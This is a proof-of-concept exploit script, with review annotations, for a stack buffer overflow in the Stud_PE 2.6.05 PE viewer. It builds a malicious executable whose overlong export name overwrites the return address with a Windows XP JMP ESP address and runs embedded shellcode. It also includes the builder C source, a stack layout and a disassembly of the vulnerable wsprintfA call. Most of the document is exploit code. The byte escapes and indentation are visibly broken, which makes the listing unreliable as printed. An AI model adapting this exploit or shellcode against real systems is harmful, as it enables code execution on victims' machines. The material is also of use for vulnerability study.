# Title : Stud_PE <= v2.6.05 Stack Overflow PoC exploit
# Published : 2010-03-28
# Author : zha0
###################################################################
# Exploit Title: Stud_PE <= v2.6.05 Stack Overflow PoC exploit
# Date: 03/28/2010
# Author: zha0
# Software Link: http://www.cgsoftlabs.ro/studpe.html
# Version: Stud_PE <= v2.6.05
# Tested on: Windows XP SP3 CHT
# CVE :
# Code :
# Greetz to : nanika, Catherine & chr00t team
###################################################################
#!/usr/bin/python
# Python 2 script (the print statements below use Python 2 syntax). It writes
# one hand-built 32-bit PE image to "shu.exe" in the current directory. That
# file is the test input for the export-name stack overflow in Stud_PE's export
# parser that the disassembly comments after this script document: the export
# name is wsprintfA'd with " %s " into a fixed 256-byte stack buffer.
#
# NOTE(review): every "\x" escape in this listing has lost its backslash (the
# same stripping shows as "!n" in the success message below), so as pasted each
# "xNN" is three literal ASCII characters and the written file is not a valid
# PE. The literal is reproduced untouched here.
pe_exe=(
# DOS header: starts with "MZ" (0x4D 0x5A); e_lfanew (offset of the PE header)
# is the last DWORD of the fourth line.
"x4Dx5Ax90x00x03x00x00x00x04x00x00x00xFFxFFx00x00"
"xB8x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00xB0x00x00x00"
# DOS stub ("This program cannot be run in DOS mode.") and Rich header.
"x0Ex1FxBAx0Ex00xB4x09xCDx21xB8x01x4CxCDx21x54x68"
"x69x73x20x70x72x6Fx67x72x61x6Dx20x63x61x6Ex6Ex6F"
"x74x20x62x65x20x72x75x6Ex20x69x6Ex20x44x4Fx53x20"
"x6Dx6Fx64x65x2Ex0Dx0Dx0Ax24x00x00x00x00x00x00x00"
"xCFxA3x03xDBx8BxC2x6Dx88x8BxC2x6Dx88x8BxC2x6Dx88"
"xBDxE4x66x88x8AxC2x6Dx88x74xE2x69x88x8AxC2x6Dx88"
"x52x69x63x68x8BxC2x6Dx88x00x00x00x00x00x00x00x00"
# "PE\0\0" signature, file header (one section) and optional header,
# including the data directories (export directory first).
"x50x45x00x00x4Cx01x01x00x75xCExAEx4Bx00x00x00x00"
"x00x00x00x00xE0x00x0Fx01x0Bx01x06x00x00x02x00x00"
"x00x00x00x00x00x00x00x00x01x10x00x00x00x10x00x00"
"x00x20x00x00x00x00x40x00x00x10x00x00x00x02x00x00"
"x04x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00"
"x00x20x00x00x00x02x00x00x00x00x00x00x02x00x00x00"
"x00x00x10x00x00x10x00x00x00x00x10x00x00x10x00x00"
"x00x00x00x00x10x00x00x00x10x10x00x00x47x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
# Single section header named ".text".
"x00x00x00x00x00x00x00x00x2Ex74x65x78x74x00x00x00"
"x57x00x00x00x00x10x00x00x00x02x00x00x00x02x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x20x00x00x60"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
# Section body: two RET instructions (0xC3), then the export directory
# produced by the ca.c build shown below.
"xC3xC3x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x75xCExAEx4Bx00x00x00x00x42x10x00x00"
"x01x00x00x00x01x00x00x00x01x00x00x00x38x10x00x00"
"x3Cx10x00x00x40x10x00x00x00x10x00x00x52x10x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
# Overlong export name: "junk" repeated (0x6A 0x75 0x6E 0x6B), matching the
# exported symbol in ca.c. This string is what overruns the 256-byte stack
# buffer in Stud_PE's export listing routine.
"x00x00x6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
# Tail of the name: "111122223333" marker bytes followed by the saved-return
# overwrite and the payload the author describes on the next line. The
# address is specific to the Windows XP CHT build named in the header, which
# is why the PoC is not portable across other Windows builds.
"x31x31x31x31x32x32x32x32x33x33x33x33xCEx24xFAx7F" # 0x7FFA24CE JMP ESP Windows XP CHT SP2,SP3
"x90xEBx0Fx5Ex8BxFEx33xC9xB1x7CxACx34x87xAAxE2xFA" # Shellcode : 146 bytes, WinExec("calc"); ExitProcess(0);
"xEBx05xE8xECxFFxFFxFFx6Fx8Fx87x87x87x1Fx79x0Dx89"
"xF9x5Fx65xF4xDFxD7xD7xEDx85xDExD8xE0xE3x26xB7x87"
"x0CxC7x8Bx0CxF7x9Bx2Ax0CxEFx8FxD6x0CxF2xBBx0CxF3"
"xA9xFFx84x72xD1x0CxF1xA7x84x72xB4x4ExCExC6x2Ax84"
"x42xB4x5Cx88x39x97xBFx75xF3x8Fx46x4Cx8Ax84x5DxC7"
"x6Cx76xBCx98xF2x60xD9x0CxD9xA3x84x5AxE1x0Cx8BxCC"
"x0CxD9x9Bx84x5Ax0Cx83x0Cx84x42x2CxDEx65x3BxDAxED"
"x87x6Fx82x87x87x87xE4xE6xEBxE4x87x78xD2x87xEDx87"
"x78xD2x83x00x00x00x00x00x00x00x00x00x00x00x00x00"
)
# Write the image out. The try/except body lines below carry no indentation
# in this listing (another artefact of the paste); they are reproduced as-is.
try:
# Binary mode: on Python 2 a str literal is written byte-for-byte.
rap = open("shu.exe",'wb')
rap.write(pe_exe)
# No try/finally: if write() raises, the handle is left open until exit.
rap.close()
# The trailing "n" is a stripped "\n" escape, like the "\x" escapes above.
print "Exploit file created!n"
# Bare except: swallows every error (permission denied, disk full, even
# KeyboardInterrupt) and hides the actual reason behind a one-line message;
# narrowing it to IOError and printing the exception would aid diagnosis.
except:
print "Error occured!"
# ---------------------------------------- ca.c Source ---------------------------------------------------------------
# // cl ca.c
# #include <windows.h>
#
# #pragma comment(linker, "/ENTRY:WinMain")
# #pragma comment(linker, "/ALIGN:4096 /FILEALIGN:512")
# #pragma comment(linker, "/merge:.rdata=.text")
# #pragma optimize("gsy", on)
#
# extern "C" __declspec (dllexport) void junkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkju111122223333444455555(void){}
#
# int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { return 0; }
#
# ---------------------------------------- Stack ---------------------------------------------------------------------
# 0012F5BC
# ....
# .... 100h = 256 bytes
# .... (contains string " rva: %08X ord: %1d" ..)
# ....
# 0012F6BC 0012F6EC Pointer to next SEH record
# 0012F6C0 00484171 SE handler
# 0012F6C4 FFFFFFFF
# 0012F6C8 00407C45 RETURN to Stud_PE.00407C45 from Stud_PE.0042F070
#
# ---------------------------------------- Stud_PE Code --------------------------------------------------------------
# sub_42F070
# .....
# 0042F4E9 |> B9 40000000 |MOV ECX,40 ; 40*sizeof(DWORD)
# 0042F4EE |. 33C0 |XOR EAX,EAX
# 0042F4F0 |. 8DBC24 58020000 |LEA EDI,DWORD PTR SS:[ESP+258]
# 0042F4F7 |. F3:AB |REP STOS DWORD PTR ES:[EDI]
#
# 0042F4F9 |. 8B4424 1C |MOV EAX,DWORD PTR SS:[ESP+1C]
# 0042F4FD |. 8B0CB0 |MOV ECX,DWORD PTR DS:[EAX+ESI*4]
# 0042F500 |. 51 |PUSH ECX
# 0042F501 |. 8D8C24 30010000 |LEA ECX,DWORD PTR SS:[ESP+130]
# 0042F508 |. E8 A3AFFFFF |CALL Stud_PE.0042A4B0
#
# // Copy the export name to stack
# 0042F50D |. 50 |PUSH EAX ; /<%s>
# 0042F50E |. 8D9424 5C020000 |LEA EDX,DWORD PTR SS:[ESP+25C] ; |
# 0042F515 |. 68 40B44A00 |PUSH Stud_PE.004AB440 ; |Format = " %s "
# 0042F51A |. 52 |PUSH EDX ; |s
# 0042F51B |. FF15 74864800 |CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; wsprintfA
# 0042F521 |. 83C4 0C |ADD ESP,0C
# 0042F524 |> 3B75 18 |CMP ESI,[ARG.5]
# 0042F527 |. 75 1B |JNZ SHORT Stud_PE.0042F544
#
# 0042F529 |. 68 38B44A00 |PUSH Stud_PE.004AB438 ; /<%s> = "No name"
# 0042F52E |. 8D8424 5C020000 |LEA EAX,DWORD PTR SS:[ESP+25C] ; |
# 0042F535 |. 68 40B44A00 |PUSH Stud_PE.004AB440 ; |Format = " %s "
# 0042F53A |. 50 |PUSH EAX ; |s
# 0042F53B |. FF15 74864800 |CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; wsprintfA
# 0042F541 |. 83C4 0C |ADD ESP,0C
#
# 0042F544 |> 8D7C24 2C |LEA EDI,DWORD PTR SS:[ESP+2C]
# 0042F548 |. 83C9 FF |OR ECX,FFFFFFFF
# 0042F54B |. 33C0 |XOR EAX,EAX
# 0042F54D |. 8D9424 58020000 |LEA EDX,DWORD PTR SS:[ESP+258]
# 0042F554 |. F2:AE |REPNE SCAS BYTE PTR ES:[EDI]
# 0042F556 |. F7D1 |NOT ECX
# 0042F558 |. 2BF9 |SUB EDI,ECX
# 0042F55A |. 50 |PUSH EAX ; /Arg9 => 00000000
# 0042F55B |. 8BF7 |MOV ESI,EDI ; |
# 0042F55D |. 8BFA |MOV EDI,EDX ; |
# 0042F55F |. 8BD1 |MOV EDX,ECX ; |
# 0042F561 |. 83C9 FF |OR ECX,FFFFFFFF ; |
# 0042F564 |. F2:AE |REPNE SCAS BYTE PTR ES:[EDI] ; |
# 0042F566 |. 8BCA |MOV ECX,EDX ; |
# 0042F568 |. 4F |DEC EDI ; |
# 0042F569 |. C1E9 02 |SHR ECX,2 ; |
# 0042F56C |. F3:A5 |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; |
# ...........
#